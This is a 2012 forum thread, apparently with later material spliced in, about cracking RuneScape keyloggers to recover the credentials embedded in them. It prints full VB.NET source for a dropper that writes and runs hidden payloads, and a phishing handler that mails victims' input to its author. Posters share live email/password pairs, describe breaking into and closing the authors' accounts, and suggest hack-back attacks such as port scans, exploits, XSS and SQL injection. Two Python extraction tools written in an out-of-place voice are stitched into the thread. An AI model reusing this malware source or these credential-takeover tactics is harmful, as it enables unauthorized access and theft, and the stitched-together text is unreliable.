[QUOTE=Ratzz;34900397]Is it really that easy?[/QUOTE]
Pretty much.
[QUOTE=Ratzz;34900397]Is it really that easy?[/QUOTE]
You need some knowledge of Visual Basic/C# and a copy of Visual Studio Express for the more complex ones.
[QUOTE=supersnail11;34900636]You need some knowledge of Visual Basic/C# and a copy of Visual Studio Express for the more complex ones.[/QUOTE]
Alright, that's no problem then. Thanks guys!
Ok so that's pretty clever.
This was a rar that had a folder inside a folder inside a folder, all with the same name, so you'd click on the first one, click on the second one, click on the third one, and then click on the application because you thought it was a folder.
I hope that wasn't a virus I just accidentally ran.
[editline]27th February 2012[/editline]
aaand it was a virus.
[QUOTE=supersnail11;34904576]Ok so that's pretty clever.
This was a rar that had a folder inside a folder inside a folder, all with the same name, so you'd click on the first one, click on the second one, click on the third one, and then click on the application because you thought it was a folder.
I hope that wasn't a virus I just accidentally ran.
[editline]27th February 2012[/editline]
aaand it was a virus.[/QUOTE]
Hope you can clean your system easily
HOLY
FUCKING
[b]JESUS[/b]
Cracked a keylogger, I get [b][i]915[/i][/b] logs from Project Neptune, including the keys logged from my PC.
And, they weren't sent to anyone. They're stored entirely on the gmail.
Holy.
Fuck.
Also, he has the keylogger installed himself :P
[editline]28th February 2012[/editline]
That was the virus I ran. So I'm now getting keylogger logs from my own computer
[editline]28th February 2012[/editline]
Ah, and here's his Runescape username.
[editline]28th February 2012[/editline]
[url]http://www.youtube.com/watch?v=VzW8eH68NTM[/url]
He used the gmail as his youtube account.
Apparently this guy thought no obfuscation except for this was enough.
[csharp]// The Gmail password is never present as one literal: it is rebuilt at run time
// by concatenating several char[] fields, with this.k repeated between the pieces.
new NetworkCredential("ajax329rs@gmail.com", new string(this.t) + new string(this.k) + new string(this.a) + new string(this.k) + new string(this.l) + new string(this.k) + new string(this.j) + new string(this.k) + new string(this.z) + new string(this.k) + new string(this.p));
[/csharp]
[code]http://www.youtube.com/watch?v=UqogO9K0ujo
ajax329rs@gmail.com:Galatasaray
okan01@live.nl[/code]
Would this fall under white hat hacking?
Or just saving the ignorant?
Boredom.
Got into one, Google said "Woops, can't let you do that, you're from a different country. Guess the email or answer security question."
Security question was "What town do you usually log in from?"
Their YouTube profile said they were from Denmark
I typed in Denmark
It worked.
[editline]28th February 2012[/editline]
Pages upon pages of Neptune logs..
[editline]28th February 2012[/editline]
[url]http://www.youtube.com/watch?v=9qBO_elhA1g[/url]
This one is down
So I wonder, who has gotten the most loot with just one account stealer?
[img]http://dl.dropbox.com/u/11401644/Images/spiral_loot.png[/img]
I got a bunch of facebook, runescape, steam, etc. details from one, but you beat me.
Also, here's some help for you guys: The two main keyloggers I've found:
[b]Project Neptune[/b]
The least dangerous of the two, it consists of one main namespace that contains a ton of variables with russian and indian characters. The username and password are encrypted with TripleDES. You can find the credentials by first finding the SendEmail function. Then you find all references to it, where you should find a line that looks like this:
[code]Module1.SendEmail(ref Module1.ΛνυψΙΖ, [highlight]ref Module1.ΗλΘυΓ, ref Module1.νςΜρΔ[/highlight], ref Module1.ΖγΡχΦ, ref text2, ref text, ref value, ref Module1.τΦΗξΝν);[/code]
The variables highlighted in red are the username and password. Right click and go to definition to find the encoded values. Then right click and find all references to find a line that reassigns the variable. The variable farthest to the right is the key to the encryption.
[code]Module1.νςΜρΔ = Module1.ΓρΦα(Module1.ΓρΦα(Module1.νςΜρΔ, "Application.StartupPath"), [highlight]Module1.ΕΜΨηπ[/highlight]);[/code]
(Highlighted variable is the key).
In terms of a system standpoint, all Neptune does is take pictures and log keystrokes, then sends them to the email.
[b]Unknown Logger[/b]
Unknown Logger is a nasty piece of shit. While easy to decode, DO NOT FUCKING RUN THIS. It will disable your antivirus, steal your Steam info, CD keys, OS keys, Facebook details, any online game details, and basically anything worth anything that it can get its hands on.
In terms of decrypting, it's pretty easy. Open up the executable with Notepad or Notepad++, and find the line that has values separated by what is usually something like "@Unknown Logger V 1.2@" (always in between two @). The first value in between the @@ is the username, the second is the password, the third is the server.
[editline]28th February 2012[/editline]
For anyone looking to try their hand at Fallen-Empire, don't. The .NET assembly just loads an embedded C++ application, so no use trying.
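For the Unknown Logger case described above, here is an added Python extractor (my code, not from the thread and not from the logger's author) that does in a script what the post does with Notepad: locate the run of values separated by the version delimiter in the raw executable and split it into username, password and server. It assumes the delimiter text quoted in the post; the sample bytes are constructed stand-ins rather than a real sample, and the 8-bit fallback is my addition for builds that keep the line as plain ANSI text.

```python
import re

# Delimiter as quoted in the post above. The version text varies per build,
# so pass the exact string you see in the binary.
DELIM = "@Unknown Logger V 1.2@"
FIELDS = ("username", "password", "server")

# Constructed stand-ins, not bytes from a real sample. A .NET build keeps its
# string literals in the #US heap as UTF-16LE, which is why Notepad shows a
# NUL after every character; the second sample mimics a build that stores the
# same line as plain 8-bit text (assumed layout, added for the fallback path).
_CONFIG = DELIM.join(["logs@example.invalid", "hunter2", "smtp.example.invalid"])
SAMPLE_DOTNET = (
    b"MZ" + b"\x00" * 41                            # odd-length prefix: heap not 2-byte aligned
    + "unrelated literal".encode("utf-16-le") + b"\x00\x00"
    + _CONFIG.encode("utf-16-le") + b"\x00\x00"
    + b"\xff" * 8
)
SAMPLE_ANSI = b"\x00" * 16 + b"Form1\x00" + _CONFIG.encode("latin-1") + b"\x00\x00\x90\x90"


def decoded_views(blob):
    """Yield (encoding, text) views: UTF-16LE at both byte alignments, then 8-bit."""
    yield "utf-16-le", blob.decode("utf-16-le", errors="replace")
    yield "utf-16-le", blob[1:].decode("utf-16-le", errors="replace")
    yield "latin-1", blob.decode("latin-1")


def find_delimited_config(blob, delim=DELIM, fields=FIELDS):
    """Return {"encoding", "username", "password", "server"} for the first run
    of delim-separated values in blob, or None if the delimiter never appears."""
    for enc, text in decoded_views(blob):
        if delim not in text:
            continue
        parts = text.split(delim)
        # Values between two delimiters are complete. The first and last values
        # are bounded by non-printable bytes instead, so keep only the printable
        # run touching the delimiter; if none touches it, that side has no value.
        head = re.search(r"[\x20-\x7e]+$", parts[0])
        tail = re.match(r"[\x20-\x7e]+", parts[-1])
        values = ([head.group()] if head else []) + parts[1:-1] + ([tail.group()] if tail else [])
        values = [v.strip() for v in values if v.strip()]
        if len(values) < len(fields):
            continue          # delimiter found but not a full config line
        result = {"encoding": enc}
        result.update(zip(fields, values))
        return result
    return None


if __name__ == "__main__":
    for label, blob in (("dotnet", SAMPLE_DOTNET), ("ansi", SAMPLE_ANSI)):
        print(label, find_delimited_config(blob))
```

Trying both UTF-16 alignments matters on real files: the #US heap prefixes each string with a length byte, so a given literal can start at an odd offset, and a single decode pass would turn every ASCII character into a CJK code point and miss the delimiter.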
YES! Got another one it only has 2 accounts, but still deleting it.
[QUOTE=supersnail11;34906013]For anyone looking to try their hand at Fallen-Empire, don't. The .NET assembly just loads an embedded C++ application, so no use trying.[/QUOTE]
Well, mainly those are nicely coded RATs. So even if you reverse them you end up getting nowhere except for the callback point. I have reported something like 5 CyberGate RATs and haven't heard anything back from No-IP.
It would be nice if you could "steal" rat victims by reverse engineering the server, and then mass uninstall the botnet, leaving a .txt on their desktop saying something like "be more careful next time"
But sadly, you can't
OR
You could look for the no-ip address by decompiling it, look at which ip it points to, scan that ip for any open ports that have exploits (Or find exploits for them), gain full access to that computer, remotely control the rat to transfer to your server, and uninstall all bots
Sadly, while for a good cause, still black hat hacking
[QUOTE=nekosune;34885646]This guy is clever, used variable names of odd characters.
[editline]26th February 2012[/editline]
Well I hit a snag here, it uploads everything to a website, not IRC.[/QUOTE]
Try XSS or SQL injection.
Project Neptune Binder Source
[csharp]
' VB.NET builder template. The +Loc+, +Delay+, +Names+ and +Byts+ tokens are
' replaced by the binder GUI with one entry per bound file before the stub is compiled.
Imports System
Imports Microsoft.VisualBasic
Module Binder
    Dim Locations As String() = {"+Loc+"}   ' drop folder per file: special-folder name or literal path
    Dim Delays As String() = {"+Delay+"}    ' minutes to wait before launching each file
    Dim Names As String() = {"+Names+"}     ' file name to write into that folder
    Dim Byts As String() = {"+Byts+"}       ' Base64 of the XOR-wrapped file bytes
    Sub Main()
        On Error Resume Next   ' every failure is swallowed so a bad drop never shows an error
        ' Resolve the symbolic folder names to real paths for the current user.
        For i As Integer = 0 To Locations.GetUpperBound(0)
            Select Case Locations(i)
                Case "AppData"
                    Locations(i) = Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData)
                Case "Favorites"
                    Locations(i) = Environment.GetFolderPath(System.Environment.SpecialFolder.Favorites)
                Case "MyDocuments"
                    Locations(i) = Environment.GetFolderPath(System.Environment.SpecialFolder.MyDocuments)
                Case "System"
                    Locations(i) = Environment.GetFolderPath(System.Environment.SpecialFolder.System)
                Case Else
                    Locations(i) = Locations(i)   ' already a literal path; kept as-is
            End Select
        Next
        ' Decode, write, wait, execute: one pass per embedded file.
        For i As Integer = 0 To Byts.GetUpperBound(0)
            Dim BFile As Byte() = decrypt(Convert.FromBase64String(Byts(i)), "thyonic")
            Dim Location As String = Locations(i) & "\" & Names(i)
            IO.File.WriteAllBytes(Location, BFile)
            wait(CInt(Delays(i)) * 1000 * 60)   ' Delays holds minutes as text
            System.Diagnostics.Process.Start(Location)
        Next
    End Sub
    ' Busy-wait that keeps pumping messages; needs a reference to System.Windows.Forms.
    Private Sub wait(ByVal interval As Integer)
        Dim sw As New System.Diagnostics.Stopwatch
        sw.Start()
        Do While sw.ElapsedMilliseconds < interval
            ' Allows UI to remain responsive
            System.Windows.Forms.Application.DoEvents()
        Loop
        sw.Stop()
    End Sub
    ' The last byte XOR 112 is a per-file mask. Every other byte is XORed with
    ' that mask and with the password, which cycles; the mask byte is then trimmed.
    Function decrypt(ByVal message As Byte(), ByVal password As String) As Byte()
        Dim passarr As Byte() = System.Text.Encoding.Default.GetBytes(password)
        Dim rand1 As Integer = message(message.Length - 1) Xor 112
        Dim outarr(message.Length) As Byte
        Dim u1 As Integer
        For i1 As Integer = 0 To message.Length - 1
            outarr(i1) = (message(i1) Xor rand1) Xor passarr(u1)
            If u1 = password.Length - 1 Then u1 = 0 Else u1 = u1 + 1
        Next
        ReDim Preserve outarr(message.Length - 2)   ' drop the trailing mask byte
        Return outarr
    End Function
End Module
[/csharp]
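The decrypt() routine in the binder source above is all that stands between the stub and its embedded payloads, so here is an added Python port (my code, not from the thread and not from Project Neptune) that walks the four parallel arrays the way Main() does but only decodes, writing and executing nothing. The key "thyonic" is the one hard-coded in the source; the payload bytes, the 0xA7 mask and the array entries are constructed test data, and the wrap function exists only to build that test vector offline.

```python
import base64

BINDER_KEY = "thyonic"   # the password hard-coded in the binder source above


def recover_mask(message: bytes) -> int:
    """The builder appends one random byte XOR 112 as the trailer; undo that."""
    if not message:
        raise ValueError("empty blob: not even a trailer byte")
    return message[-1] ^ 112


def xor_unwrap(message: bytes, password: str = BINDER_KEY) -> bytes:
    """Port of decrypt(): every byte except the trailer is XORed with the mask
    and with the password, which cycles; the trailer itself is dropped."""
    mask = recover_mask(message)
    # Encoding.Default is the ANSI code page; for an ASCII password latin-1 is identical.
    pw = password.encode("latin-1")
    return bytes((b ^ mask) ^ pw[i % len(pw)] for i, b in enumerate(message[:-1]))


def xor_wrap(payload: bytes, password: str = BINDER_KEY, mask: int = 0) -> bytes:
    """Inverse of xor_unwrap, used here only to build an offline test vector;
    mask is the per-file random byte (0-255) a real builder would pick."""
    pw = password.encode("latin-1")
    body = bytes((b ^ pw[i % len(pw)]) ^ mask for i, b in enumerate(payload))
    return body + bytes([mask ^ 112])


def unpack_stub_arrays(byts, names, locations, delays, password=BINDER_KEY):
    """Walk the four parallel arrays the way Main() does, but only decode:
    nothing is written to disk or started. Folder names stay symbolic."""
    dropped = []
    for b64, name, folder, delay in zip(byts, names, locations, delays):
        payload = xor_unwrap(base64.b64decode(b64), password)
        dropped.append({
            "path": folder + "\\" + name,
            "delay_minutes": int(delay),
            "is_pe": payload[:2] == b"MZ",   # quick sanity check that the key was right
            "payload": payload,
        })
    return dropped


# Constructed test data, not a real bound file: a fake MZ header plus filler.
SAMPLE_PAYLOAD = b"MZ\x90\x00" + bytes(range(64))
SAMPLE_BYTS = [base64.b64encode(xor_wrap(SAMPLE_PAYLOAD, BINDER_KEY, 0xA7)).decode("ascii")]
SAMPLE_NAMES = ["svchost.exe"]
SAMPLE_LOCATIONS = ["AppData"]
SAMPLE_DELAYS = ["1"]


if __name__ == "__main__":
    for item in unpack_stub_arrays(SAMPLE_BYTS, SAMPLE_NAMES, SAMPLE_LOCATIONS, SAMPLE_DELAYS):
        print(item["path"], item["delay_minutes"], item["is_pe"], len(item["payload"]))
```

Because the mask sits in the blob itself and the password is a string literal in the stub, a wrong guess at the key shows up immediately as a payload that does not start with MZ; that check is cheaper than any disassembly of the dropped file.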
[QUOTE=uitham;34913125]It would be nice if you could "steal" rat victims by reverse engineering the server, and then mass uninstall the botnet, leaving a .txt on their desktop saying something like "be more careful next time"
But sadly, you can't
OR
You could look for the no-ip address by decompiling it, look at which ip it points to, scan that ip for any open ports that have exploits (Or find exploits for them), gain full access to that computer, remotely control the rat to transfer to your server, and uninstall all bots
Sadly, while for a good cause, still black hat hacking[/QUOTE]
How is it black hat? Doesn't black hat mean it's for a bad cause?
[QUOTE=Darwin226;34913380]How is it black hat? Doesn't black hat mean it's for a bad cause?[/QUOTE]
Black hat hacking is to hack with malicious intent.
[QUOTE=uitham;34913125]It would be nice if you could "steal" rat victims by reverse engineering the server, and then mass uninstall the botnet, leaving a .txt on their desktop saying something like "be more careful next time"
But sadly, you can't
OR
You could look for the no-ip address by decompiling it, look at which ip it points to, scan that ip for any open ports that have exploits (Or find exploits for them), gain full access to that computer, remotely control the rat to transfer to your server, and uninstall all bots
Sadly, while for a good cause, still black hat hacking[/QUOTE]
Well, I did port scan/geo-IP the ones I reported and they are all personal computers. I would report them to their ISPs but I have tried that in the past and got nowhere.
In case any of you come across this .NET packed one. Its assembly name is tyronerat. It's a VB6 virus. If you want the VB6 binary just PM me.
[url]http://anubis.iseclab.org/?action=result&task_id=1a7a14d5f95b5d554e1f6d96d183a8297&format=html[/url]
ssj4000ajaxmoo.no-ip.biz
108.85.134.100
108-85-134-100.lightspeed.austtx.sbcglobal.net
[img]http://i.imgur.com/aYWj3.png[/img]
Nope, no scam here. Guess I'll try a different hack.
Since my programming skills are pretty small (only C++) I can only get emails from simple VB obfuscated "hacks". I have a more advanced one now.
[url]http://pastebin.com/wxqY1ZdK[/url]
One of the encrypted strings is too long so I will post it separately.
[url]http://pastebin.com/XgmE9T9L[/url]
It is declared right after
[code]
try
{
[/code]
Problem is I'm not quite sure what is happening. Is it decrypting the string (which is source code for the malicious part of the program?) and then executing it when the program is run? Because there is an Assembly.
I tried to output the decrypted string, but all I got was even more incomprehensible text. So could anyone explain?
The guy from RunescapeBundler just tried to recover his account.
Just replied to the google email and the process is cancelled.
[code]
' Decompiled VB.NET button handler; needs System.Net and System.Net.Mail.
Imports System.Net
Imports System.Net.Mail

Private Sub Button1_Click(sender As Object, e As EventArgs)
    Dim mailMessage As MailMessage = New MailMessage()
    Dim smtpClient As SmtpClient = New SmtpClient()
    ' Drop-box credentials hard-coded in the binary: whatever the two form
    ' fields contain is mailed straight to the author's own inbox.
    smtpClient.Credentials = New NetworkCredential("jom21@hotmail.de", "lollol852")
    smtpClient.Port = 587
    smtpClient.Host = "smtp.live.com"
    smtpClient.EnableSsl = True
    mailMessage.[To].Add("jom21@hotmail.de")
    mailMessage.From = New MailAddress("Username@gmail.com")
    mailMessage.Subject = "lollol852"   ' the SMTP password reused as the subject line
    mailMessage.Body = Me.TextBox1.Text + Me.TextBox2.Text   ' both form fields, concatenated
    smtpClient.Send(mailMessage)
    Me.Timer1.Start()
End Sub
[/code]
HMM I WONDER WHAT HIS CREDENTIALS ARE
Also with large complicated stuff, is it best to just run the decryption part and print the result?
Too late.
[editline]28th February 2012[/editline]
Already did that, closed account
[editline]28th February 2012[/editline]
Like yesterday
[QUOTE=supersnail11;34914465]Too late.
[editline]28th February 2012[/editline]
Already did that, closed account
[editline]28th February 2012[/editline]
Like yesterday[/QUOTE]
You came across "Runescape Gold Generator" yet?
The one with the variable names like ఋ?
There may be more like that, but THEY ARE SO FREAKING HARD
[url]http://www.youtube.com/watch?v=329CV_8hcgA[/url]
This is why you don't use your GMail for your YouTube when you're keylogging.
[QUOTE=uitham;34914543]You came across "Runescape Gold Generator" yet?
The one with the variable names like ఋ?
There may be more like that, but THEY ARE SO FREAKING HARD[/QUOTE]
Probably because they were obfuscated.
[QUOTE=uitham;34914543]You came across "Runescape Gold Generator" yet?
The one with the variable names like ఋ?
There may be more like that, but THEY ARE SO FREAKING HARD[/QUOTE]
Variable names like ఋ mean that it's Project Neptune. They're actually pretty easy. Just find the encoded strings and the key, and then use this: [url]http://www.tools4noobs.com/online_tools/decrypt/[/url] (TripleDES)